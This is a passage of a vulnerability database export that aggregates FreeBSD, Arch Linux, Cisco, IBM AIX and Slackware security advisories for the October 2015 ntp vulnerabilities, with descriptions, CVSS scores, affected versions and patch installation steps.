CVE-2015-7851 saveconfig Directory Traversal\n\t\tVulnerability. (OpenVMS) (Cisco TALOS)\nBug 2917 CVE-2015-7850 remote config logfile-keyfile.\n\t\t(Cisco TALOS)\nBug 2916 CVE-2015-7849 trusted key use-after-free.\n\t\t(Cisco TALOS)\nBug 2913 CVE-2015-7848 mode 7 loop counter underrun.\n\t\t(Cisco TALOS)\nBug 2909 CVE-2015-7701 Slow memory leak in CRYPTO_ASSOC.\n\t\t(Tenable)\nBug 2902 : CVE-2015-7703 configuration directives \"pidfile\"\n\t\tand \"driftfile\" should only be allowed locally. (RedHat)\nBug 2901 : CVE-2015-7704, CVE-2015-7705 Clients that\n\t\treceive a KoD should validate the origin timestamp field.\n\t\t(Boston University)\nBug 2899 : CVE-2015-7691, CVE-2015-7692, CVE-2015-7702\n\t\tIncomplete autokey data packet length checks. (Tenable)\n\nThe only generally-exploitable bug in the above list is the\n\t crypto-NAK bug, which has a CVSS2 score of 6.4.\nAdditionally, three bugs that have already been fixed in\n\t ntp-4.2.8 but were not fixed in ntp-4.2.6 as it was EOL'd\n\t have a security component, but are all below 1.8 CVSS score,\n\t so we're reporting them here:\n\nBug 2382 : Peer precision < -31 gives division by zero\nBug 1774 : Segfaults if cryptostats enabled when built\n\t\twithout OpenSSL\nBug 1593 : ntpd abort in free() with logconfig syntax error\n\n\n", "edition": 8, "modified": "2016-08-09T00:00:00", "published": "2015-10-21T00:00:00", "id": "C4A18A12-77FC-11E5-A687-206A8A720317", "href": "https://vuxml.freebsd.org/freebsd/c4a18a12-77fc-11e5-a687-206a8a720317.html", "title": "ntp -- 13 low- and medium-severity vulnerabilities", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:43", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7703", "CVE-2015-7855", "CVE-2015-7704", "CVE-2015-7701", "CVE-2015-7848", "CVE-2015-7692", "CVE-2015-7851", "CVE-2015-7702", "CVE-2015-7852", "CVE-2015-7871", "CVE-2015-7849", "CVE-2015-7691", "CVE-2015-7705", "CVE-2015-7850", "CVE-2015-7854", "CVE-2015-7853"], "description": "- CVE-2015-7871 (authentication bypass) \nAn error handling logic error exists within ntpd that manifests due to improper\nerror condition handling associated with certain crypto-NAK packets. An\nunauthenticated, off­-path attacker can force ntpd processes on targeted servers\nto peer with time sources of the attacker's choosing by transmitting symmetric\nactive crypto­-NAK packets to ntpd. This attack bypasses the authentication\ntypically required to establish a peer association and allows an attacker to\nmake arbitrary changes to system time. Matthew Van Gundy of Cisco ASIG is\ncredited with discovering this vulnerability. [1] \n\n- CVE-2015-7855 (denial of service)\ndecodenetnum() will ASSERT botch instead of returning FAIL on some bogus values.\nThis can cause a denial of service.\n\n- CVE-2015-7854 (memory corruption)\nA potential buffer overflow vulnerability exists in the password management\nfunctionality of ntp. A specially crafted key file could cause a buffer overflow\npotentially resulting in memory being modified. An attacker could provide a\nmalicious password to trigger this vulnerability. [2]\n\n- CVE-2015-7849 (memory corruption)\nAn exploitable use-after-free vulnerability exists in the password management\nfunctionality of the Network Time Protocol. A specially crafted key file could\ncause a buffer overflow resulting in memory corruption. An attacker could\nprovide a malicious password file to trigger this vulnerability. [3]\n\n- CVE-2015-7852 (memory corruption)\nA potential off by one vulnerability exists in the cookedprint functionality of\nntpq. A specially crafted buffer could cause a buffer overflow potentially\nresulting in null byte being written out of bounds. [4]\n\n- CVE-2015-7853 (memory corruption)\nA potential buffer overflow vulnerability exists in the refclock of ntpd. An\ninvalid length provided by a hardware reference clock could cause a buffer\noverflow potentially resulting in memory being modified. A malicious reflock\ncould provide a negative length to trigger this vulnerability. [5]\n\n- CVE-2015-7848 (denial of service)\nWhen processing a specially crafted private mode packet, an integer overflow can\noccur leading to out of bounds memory copy operation. The crafted packet needs\nto have the correct message authentication code and a valid timestamp. When\nprocessed by the NTP daemon, it leads to an immediate crash. [6]\n\n- CVE-2015-7850 (denial of service)\nAn exploitable denial of service vulnerability exists in the remote\nconfiguration functionality of the Network Time Protocol. A specially crafted\nconfiguration file could cause an endless loop resulting in a denial of service.\nAn attacker could provide a the malicious configuration file to trigger this\nvulnerability. [7]\n\n- CVE-2015-7851 (directory traversal)\nA potential path traversal vulnerability exists in the config file saving of\nntpd on VMS. A specially crafted path could cause a path traversal potentially\nresulting in files being overwritten. An attacker could provide a malicious path\nto trigger this vulnerability. [8] \n\n- CVE-2015-7701 (memory leak)\nSlow memory leak in CRYPTO_ASSOC.\n\n- CVE-2015-7702 (denial of service).\nIncomplete autokey data packet length checks.\n\n- CVE-2015-7703 (directory traversal)\nconfiguration directives "pidfile" and "driftfile" should only be allowed\nlocally. \n\n- CVE-2015-7704 (denial of service)\nClients that receive a KoD should validate the origin timestamp field.\n\n- CVE-2015-7705 (denial of service)\nClients that receive a KoD should validate the origin timestamp field.\n\n- CVE-2015-7691 (denial of service)\nIncomplete autokey data packet length checks.\n\n- CVE-2015-7692 (denial of service \nIncomplete autokey data packet length checks.", "modified": "2015-10-22T00:00:00", "published": "2015-10-22T00:00:00", "id": "ASA-201510-14", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-October/000416.html", "type": "archlinux", "title": "ntp: multiple issues", "cvss": {"score": 0.0, "vector": "NONE"}}], "cisco": [{"lastseen": "2020-12-24T11:41:29", "bulletinFamily": "software", "cvelist": ["CVE-2015-7691", "CVE-2015-7692", "CVE-2015-7701", "CVE-2015-7702", "CVE-2015-7703", "CVE-2015-7704", "CVE-2015-7705", "CVE-2015-7848", "CVE-2015-7849", "CVE-2015-7850", "CVE-2015-7851", "CVE-2015-7852", "CVE-2015-7853", "CVE-2015-7854", "CVE-2015-7855", "CVE-2015-7871"], "description": "A vulnerability in the Network Time Protocol (NTP) daemon could allow an unauthenticated, remote attacker to cause a denial of service condition.\n\nThe vulnerability is due to improper memory operations performed by the affected software when handling private mode packets. An attacker could exploit the vulnerability by submitting a crafted NTP request to a targeted system. A successful exploit could allow the attacker to abnormally terminate the NTP process, leading to a denial of service condition for legitimate users.\n\nA vulnerability in the Network Time Protocol daemon (ntpd) could allow a local attacker to cause memory corruption.\n\nThe vulnerability is due to improper memory operations performed by the affected software when handling crafted refclock drivers. An attacker could exploit the vulnerability by loading a crafted refclock driver. A successful exploit could allow the attacker to cause memory corruption on the targeted system.\n\nA vulnerability in the Network Time Protocol daemon (ntpd) could allow an authenticated, remote attacker to bypass security restrictions.\n\nThe vulnerability is due to improper memory operations performed by the affected software when handling key files. An attacker could exploit the vulnerability by submitting a crafted Network Time Protocol (NTP) request to a targeted system. A successful exploit could allow the attacker to bypass security restrictions.\n\nA vulnerability in the Network Time Protocol daemon (ntpd) could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on an affected system.\n\nThe vulnerability is due to improper processing of Network Time Protocol (NTP) packets when processing configuration files. An attacker could exploit this vulnerability by sending a malicious configuration file to a targeted system. If successful, the attacker could cause the service to fail, leading to a DoS condition for legitimate users.\n\nA vulnerability in the Network Time Protocol daemon (ntpd) could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition.\n\nThe vulnerability is due to improper boundary checking when performing memory operations. An unauthenticated, remote attacker could exploit the vulnerability by sending malicious requests to a targeted system, triggering a memory operation that could result in an off-by-one error. If successful, the attacker could cause memory corruption that could result in a DoS condition.\n\nA vulnerability in the Network Time Protocol daemon (ntpd) could allow an unauthenticated, remote attacker to cause memory corruption.\n\nThe vulnerability is due to improper memory operations performed by the affected software when handling crafted key files. An attacker could exploit the vulnerability by submitting a crafted password to the affected software. A successful exploit could allow the attacker to cause memory corruption on the targeted system.\n\nA vulnerability in the Network Time Protocol daemon (ntpd) could allow an unauthenticated, remote attacker to conduct directory traversal attacks.\n\nThe vulnerability is due to improper handling of directory traversal character sequences. An unauthenticated, remote attacker could exploit the vulnerability by sending requests containing directory traversal character sequences to the targeted system. If successful, the attacker could write to arbitrary locations on the targeted system.\n\nA vulnerability in the Network Time Protocol daemon could allow an unauthenticated, remote attacker to bypass authentication restrictions and gain unauthorized access to the affected application.\n\nThe vulnerability is due to improper authentication checks when establishing symmetric peer relationships. An unauthenticated, remote attacker could exploit the vulnerability by sending malicious peer requests to the targeted system.\n\nA vulnerability in the Network Time Protocol daemon could allow an unauthenticated, remote attacker to bypass security protections.\n\nThe vulnerability is due to improper validation of user-supplied input. An unauthenticated, remote attacker could exploit the vulnerability by sending malicious requests to the targeted system.\n\nA vulnerability in the Network Time Protocol daemon could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition.\n\nThe vulnerability is due to improper handling of user-supplied input. An unauthenticated, remote attacker could exploit the vulnerability by sending malicious requests to the targeted system.\n\nA vulnerability in the Network Time Protocol daemon could allow an unauthenticated, remote attacker to modify the application configuration.\n\nThe vulnerability is due to improper validation of user-supplied input. An unauthenticated, remote attacker could exploit the vulnerability by sending malicious requests to the targeted system.\n\nMultiple Cisco products incorporate a version of the ntpd package. Versions of this package are affected by one or more vulnerabilities that could allow an unauthenticated, remote attacker to create a denial of service (DoS) condition or modify the time being advertised by a device acting as a network time protocol (NTP) server.\n\nOn October 21st, 2015, NTP.org released a security advisory detailing 13 issues regarding multiple DoS vulnerabilities, information disclosure vulnerabilities, and logic issues that may result in an attacker gaining the ability to modify an NTP server's advertised time. The vulnerabilities covered in this document are as follows:\n\nCVE-2015-7691 - Denial of Service AutoKey Malicious Message\nCVE-2015-7692 - Denial of Service AutoKey Malicious Message\nCVE-2015-7701 - Denial of Service CRYPTO_ASSOC Memory Leak\nCVE-2015-7702 - Denial of Service AutoKey Malicious Message\nCVE-2015-7703 - Configuration Directive File Overwrite Vulnerability\nCVE-2015-7704 - Denial of Service by Spoofed Kiss-o'-Death\nCVE-2015-7705 - Denial of Service by Priming the Pump\nCVE-2015-7848 - Network Time Protocol ntpd Multiple Integer Overflow Read Access Violations\nCVE-2015-7849 - Network Time Protocol Trusted Keys Memory Corruption Vulnerability\nCVE-2015-7850 - Network Time Protocol Remote Configuration Denial of Service Vulnerability\nCVE-2015-7851 - Network Time Protocol ntpd saveconfig Directory Traversal Vulnerability\nCVE-2015-7852 - Network Time Protocol ntpq atoascii Memory Corruption Vulnerability\nCVE-2015-7853 - Network Time Protocol Reference Clock Memory Corruption Vulnerability\nCVE-2015-7854 - Network Time Protocol Password Length Memory Corruption Vulnerability\nCVE-2015-7855 - Denial of Service Long Control Packet Message\nCVE-2015-7871 - NAK to the Future: NTP Symmetric Association Authentication Bypass Vulnerability\n Additional details on each of the vulnerabilities can be found at the following links:\n\nOfficial Security Advisory from ntp.org: Security Notice [\"http://support.ntp.org/bin/view/Main/SecurityNotice#Recent_Vulnerabilities\"]\nBoston University: Attacking the Network Time Protocol [\"http://www.cs.bu.edu/~goldbe/NTPattack.html\"]\nCisco TALOS: TALOS Vulnerability Reports [\"http://talosintel.com/vulnerability-reports/\"]\n\nCisco will release software updates that address these vulnerabilities.\n\nWorkarounds that mitigate one or more of the vulnerabilities may be available for certain products, please see the individual Cisco Bug IDs for details.\n\nThis advisory is available at the following link:\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151021-ntp [\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151021-ntp\"]\n\ncA vulnerability in the Network Time Protocol daemon could allow an\nunauthenticated, remote attacker to cause a denial of service (DoS)\ncondition.\n\nThe vulnerability is due to improper validation of\nuser-supplied input. An unauthenticated, remote attacker could exploit\nthe vulnerability by sending malicious requests to the targeted system.", "modified": "2016-01-27T19:20:38", "published": "2015-10-21T23:00:00", "id": "CISCO-SA-20151021-NTP", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151021-ntp", "type": "cisco", "title": "Multiple Vulnerabilities in ntpd Affecting Cisco Products - October 2015", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T11:41:38", "bulletinFamily": "software", "cvelist": ["CVE-2015-1798"], "description": "A vulnerability in the Network Time Protocol (NTP) daemon could allow an unauthenticated, adjacent attacker to bypass authentication mechanisms and access an affected system.\n\nThe vulnerability is due to incorrect validation of the message authentication code (MAC) field. An attacker could exploit this vulnerability by sending unauthenticated NTP packets to an NTP host that is configured with symmetric key authentication. An exploit could allow the attacker to inject NTP packets to the NTP host without knowing the NTP symmetric key.\n\nNTP.org has released a security notice and software updates to address the vulnerability.\n\nTo exploit the vulnerability, the attacker may need access to trusted or internal networks to transmit crafted packets to the affected system. This access requirement limits the likelihood of a successful exploit.\n\nThe vulnerability is exploitable only on an application that is configured with the symmetric key authentication mechanism. Authentication using autokey is not affected.\n\nA vulnerability in the message authentication code (MAC) validation routine of ntpd could allow an unauthenticated, remote attacker to bypass the NTP authentication feature.\n\nThe vulnerability is due to incorrect validation of the MAC field. An attacker could exploit this vulnerability by sending unauthenticated NTP packets to an NTP host that is configured with symmetric key authentication. An exploit could allow the attacker to inject NTP packets to the NTP host without the knowledge of the NTP symmetric key.", "modified": "2015-07-23T12:35:37", "published": "2015-04-08T17:05:12", "id": "CISCO-SA-20150408-CVE-2015-1798", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/Cisco-SA-20150408-CVE-2015-1798", "type": "cisco", "title": "Network Time Protocol Daemon MAC Checking Failure Authentication Bypass Vulnerability", "cvss": {"score": 1.8, "vector": "AV:A/AC:H/Au:N/C:N/I:P/A:N"}}], "aix": [{"lastseen": "2020-06-19T14:03:03", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7855", "CVE-2015-5219", "CVE-2015-7701", "CVE-2015-7692", "CVE-2015-7702", "CVE-2015-7691", "CVE-2015-7850", "CVE-2015-7853"], "description": "IBM SECURITY ADVISORY\n\nFirst Issued: Thu Jan 21 09:13:20 CST 2016\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/ntp_advisory4.asc\nhttps://aix.software.ibm.com/aix/efixes/security/ntp_advisory4.asc\nftp://aix.software.ibm.com/aix/efixes/security/ntp_advisory4.asc\n\n\nSecurity Bulletin: Vulnerabilities in NTP affect AIX\n CVE-2015-5219 CVE-2015-7691 CVE-2015-7692 CVE-2015-7701 CVE-2015-7702\n CVE-2015-7850 CVE-2015-7853 CVE-2015-7855\n\n\n===============================================================================\n\nSUMMARY:\n\n There are multiple vulnerabilities in NTP that impact AIX.\n\n\n===============================================================================\n\nVULNERABILITY DETAILS:\n\n CVEID: CVE-2015-5219\n DESCRIPTION: Network Time Protocol (NTP) is vulnerable to a denial of \n service, caused by an error in the sntp program. By sending specially \n crafted NTP packets, a remote attacker from within the local network \n could exploit this vulnerability to cause the application to enter into\n an infinite loop.\n CVSS Base Score: 4.3 \n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/107597 for more\n information.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n \n CVEID: CVE-2015-7691\n DESCRIPTION: Network Time Protocol (NTP) is vulnerable to a denial of \n service, caused by an error in ntp_crypto.c. An attacker could exploit \n this vulnerability using a packet containing an extension field with an\n invalid value for the length of its value field to cause ntpd to crash.\n CVSS Base Score: 5.3\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/107449 for more\n information.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n \n CVEID: CVE-2015-7692\n DESCRIPTION: Network Time Protocol (NTP) is vulnerable to a denial of \n service, caused by an error in ntp_crypto.c. An attacker could exploit\n this vulnerability using a packet containing an extension field with an\n invalid value for the length of its value field to cause ntpd to crash.\n CVSS Base Score: 5.3\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/107450 for more\n information.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n \n CVEID: CVE-2015-7701\n DESCRIPTION: Network Time Protocol (NTP) could allow a remote attacker to\n obtain sensitive information, caused by a memory leak in CRYPTO_ASSOC.\n An attacker could exploit this vulnerability to obtain sensitive \n information.\n CVSS Base Score: 5.3\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/107444 for more\n information.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n \n CVEID: CVE-2015-7702\n DESCRIPTION: Network Time Protocol (NTP) is vulnerable to a denial of \n service, caused by an error in ntp_crypto.c. An attacker could exploit\n this vulnerability using a packet containing an extension field with an\n invalid value for the length of its value field to cause ntpd to crash.\n CVSS Base Score: 5.3\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/107451 for more\n information.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n \n CVEID: CVE-2015-7850\n DESCRIPTION: Network Time Protocol (NTP) is vulnerable to a denial of \n service, caused by an error in the remote configuration functionality.\n By sending a specially crafted configuration file, an attacker could\n exploit this vulnerability to cause the application to enter into an\n infinite loop.\n CVSS Base Score: 5.3\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/107441 for more\n information.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n \n CVEID: CVE-2015-7853\n DESCRIPTION: Network Time Protocol (NTP) is vulnerable to a buffer \n overflow, caused by improper bounds checking by the refclock of ntpd.\n By sending an overly long string, a remote attacker could overflow a\n buffer and execute arbitrary code on the system or cause the \n application to crash.\n CVSS Base Score: 7.3\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/107438 for more\n information.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n \n CVEID: CVE-2015-7855\n DESCRIPTION: Network Time Protocol (NTP) is vulnerable to a denial of \n service, caused by ASSERT botch instead of returning FAIL on some \n invalid values by the decodenetnum() function. An attacker could \n exploit this vulnerability to cause a denial of service.\n CVSS Base Score: 5.3\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/107448 for more\n information.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n \n\n AFFECTED PRODUCTS AND VERSIONS:\n \n AIX 5.3, 6.1, 7.1, 7.2\n VIOS 2.2.x\n\n The following fileset levels are vulnerable:\n \n key_fileset = aix\n\n For NTPv3:\n\n Fileset Lower Level Upper Level KEY \n -----------------------------------------------------\n bos.net.tcp.client 5.3.12.0 5.3.12.10 key_w_fs\n bos.net.tcp.client 6.1.9.0 6.1.9.101 key_w_fs\n bos.net.tcp.client 7.1.3.0 7.1.3.45 key_w_fs\n bos.net.tcp.client 7.1.4.0 7.1.4.0 key_w_fs\n bos.net.tcp.ntp 7.2.0.0 7.2.0.0 key_w_fs\n bos.net.tcp.ntpd 7.2.0.0 7.2.0.0 key_w_fs\n \n For NTPv4:\n \n Fileset Lower Level Upper Level KEY \n -----------------------------------------------------\n ntp.rte 6.1.6.0 6.1.6.4 key_w_fs\n ntp.rte 7.1.0.0 7.1.0.4 key_w_fs\n \n Note: to find out whether the affected filesets are installed \n on your systems, refer to the lslpp command found in AIX user's guide.\n\n Example: lslpp -L | grep -i bos.net.tcp.client\n\n REMEDIATION:\n\n A. APARS\n \n IBM has assigned the following APARs to this problem:\n\n AIX Level APAR Availability SP KEY\n ------------------------------------------------\n 5.3.12 IV79946 N/A key_w_apar\n 6.1.9 IV79942 5/20/16 SP7 key_w_apar\n 7.1.3 IV79943 8/24/16 SP7 key_w_apar\n 7.1.4 IV79944 5/20/16 SP2 key_w_apar\n 7.2.0 IV79945 5/20/16 SP2 key_w_apar\n\n Subscribe to the APARs here:\n\n http://www.ibm.com/support/docview.wss?uid=isg1IV79942\n http://www.ibm.com/support/docview.wss?uid=isg1IV79943\n http://www.ibm.com/support/docview.wss?uid=isg1IV79944\n http://www.ibm.com/support/docview.wss?uid=isg1IV79945\n\n By subscribing, you will receive periodic email alerting you\n to the status of the APAR, and a link to download the fix once\n it becomes available.\n\n B. FIXES\n\n Fixes are available.\n\n The fixes can be downloaded via ftp or http from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/ntp_fix4.tar\n http://aix.software.ibm.com/aix/efixes/security/ntp_fix4.tar\n https://aix.software.ibm.com/aix/efixes/security/ntp_fix4.tar \n\n The link above is to a tar file containing this signed\n advisory, fix packages, and OpenSSL signatures for each package.\n The fixes below include prerequisite checking. This will\n enforce the correct mapping between the fixes and AIX\n Technology Levels.\n\n \n For NTPv3:\n \n AIX Level Interim Fix (*.Z) KEY\n ----------------------------------------------\n 5.3.12.9 IV79946s9a.160119.epkg.Z key_w_fix\n 6.1.9.6 IV79942s6a.160119.epkg.Z key_w_fix\n 7.1.3.5 IV79943s5b.160119.epkg.Z key_w_fix\n 7.1.4.1 IV79944s1a.160119.epkg.Z key_w_fix\n 7.2.0.1 IV79945s1a.160119.epkg.Z key_w_fix\n \n VIOS Level Interim Fix (*.Z) KEY\n -----------------------------------------------\n 2.2.4.0 IV79942s6a.160119.epkg.Z key_w_fix\n \n \n For NTPv4:\n \n AIX Level Interim Fix (*.Z) KEY\n ----------------------------------------------\n 6.1.x IV79954m4a.160119.epkg.Z key_w_fix\n 7.1.x IV79955m4a.160119.epkg.Z key_w_fix\n 7.2.x IV79955m4a.160119.epkg.Z key_w_fix\n \n VIOS Level Interim Fix (*.Z) KEY\n -----------------------------------------------\n 2.2.x IV79954m4a.160119.epkg.Z key_w_fix\n \n\n To extract the fixes from the tar file:\n\n tar xvf ntp_fix4.tar\n cd ntp_fix4\n\n Verify you have retrieved the fixes intact:\n\n The checksums below were generated using the\n \"openssl dgst -sha256 file\" command as the followng:\n\n openssl dgst -sha256 filename KEY\n -----------------------------------------------------------------------------------------------------\n 15f2849528a5ffddc55d59cc06f05f21898d8b30533bd7b785693903e341c790 IV79946s9a.160119.epkg.Z key_w_csum\n 55e95de0ef1d6ba9b262bd2138e52ea0d3434c9e3a44927e072f3c658b869e8f IV79942s6a.160119.epkg.Z key_w_csum\n f29b0fbf654f8bd12c2718320894d4bdea0fd11a6a8f621aec8d71625702d7a6 IV79943s5b.160119.epkg.Z key_w_csum\n ce1758fb35b9eb464c3633beef9daeb2e7ef9bc1ae8fb8f38a3029fdf27d04a4 IV79944s1a.160119.epkg.Z key_w_csum\n 190254a853d1adcda0d420ebc680b1dfacc48ca1de4a7070e55c8f0469cc233b IV79945s1a.160119.epkg.Z key_w_csum\n 7d9ba87d561eb6dc0a2d865676501b1c5e278f8c95ffccba27edbaae031f9e23 IV79954m4a.160119.epkg.Z key_w_csum\n 18974bfd95db93b82ceb04d57a54e76808cb8f4d37e7bc00a67406a551354e30 IV79955m4a.160119.epkg.Z key_w_csum\n\n These sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the\n integrity of the fixes. If the sums or signatures cannot be\n confirmed, contact IBM AIX Security at\n security-alert@austin.ibm.com and describe the discrepancy.\n \n openssl dgst -sha1 -verify <pubkey_file> -signature <advisory_file>.sig <advisory_file>\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <ifix_file>.sig <ifix_file>\n\n Published advisory OpenSSL signature file location:\n \n http://aix.software.ibm.com/aix/efixes/security/ntp_advisory4.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/ntp_advisory4.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/ntp_advisory4.asc.sig \n\n C. FIX AND INTERIM FIX INSTALLATION\n\n IMPORTANT: If possible, it is recommended that a mksysb backup\n of the system be created. Verify it is both bootable and\n readable before proceeding.\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\n WORKAROUNDS AND MITIGATIONS:\n\n None.\n\n\n===============================================================================\n\nCONTACT US:\n\n Note: Keywords labeled as KEY in this document are used for parsing\n purposes.\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX Security Team via security-alert@austin.ibm.com you\n can either:\n\n A. Download the key from our web page:\n\nhttp://www.ibm.com/systems/resources/systems_p_os_aix_security_pgppubkey.txt\n\n B. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n\nREFERENCES:\n \n Complete CVSS v3 Guide: http://www.first.org/cvss/user-guide\n On-line Calculator v3:\n http://www.first.org/cvss/calculator/3.0\n\n\nACKNOWLEDGEMENTS:\n\n None \n\n\nCHANGE HISTORY:\n\n First Issued: Thu Jan 21 09:13:20 CST 2016\n\n\n===============================================================================\n\n*The CVSS Environment Score is customer environment specific and will \nultimately impact the Overall CVSS Score. Customers can evaluate the impact \nof this vulnerability in their environments by accessing the links in the \nReference section of this Security Bulletin. \n\nDisclaimer\nAccording to the Forum of Incident Response and Security Teams (FIRST), the \nCommon Vulnerability Scoring System (CVSS) is an \"industry open standard \ndesigned to convey vulnerability severity and help to determine urgency and \npriority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY \nOF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS \nFOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT \nOF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n", "edition": 19, "modified": "2016-01-21T09:13:20", "published": "2016-01-21T09:13:20", "id": "NTP_ADVISORY4.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/ntp_advisory4.asc", "title": "Vulnerabilities in NTP affect AIX,Vulnerabilities in NTP affect VIOS", "type": "aix", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2020-10-25T16:35:58", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9750", "CVE-2015-5196", "CVE-2015-7691", "CVE-2015-7692", "CVE-2015-7701", "CVE-2015-7702", "CVE-2015-7704", "CVE-2015-7705", "CVE-2015-7848", "CVE-2015-7849", "CVE-2015-7850", "CVE-2015-7851", "CVE-2015-7852", "CVE-2015-7853", "CVE-2015-7854", "CVE-2015-7855", "CVE-2015-7871"], "description": "New ntp packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix security issues.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/ntp-4.2.8p4-i486-1_slack14.1.txz: Upgraded.\n In addition to bug fixes and enhancements, this release fixes\n several low and medium severity vulnerabilities.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9750\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5196\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7691\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7692\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7701\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7702\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7705\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7848\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7849\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7850\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7851\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7852\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7853\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7854\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7855\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7871\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 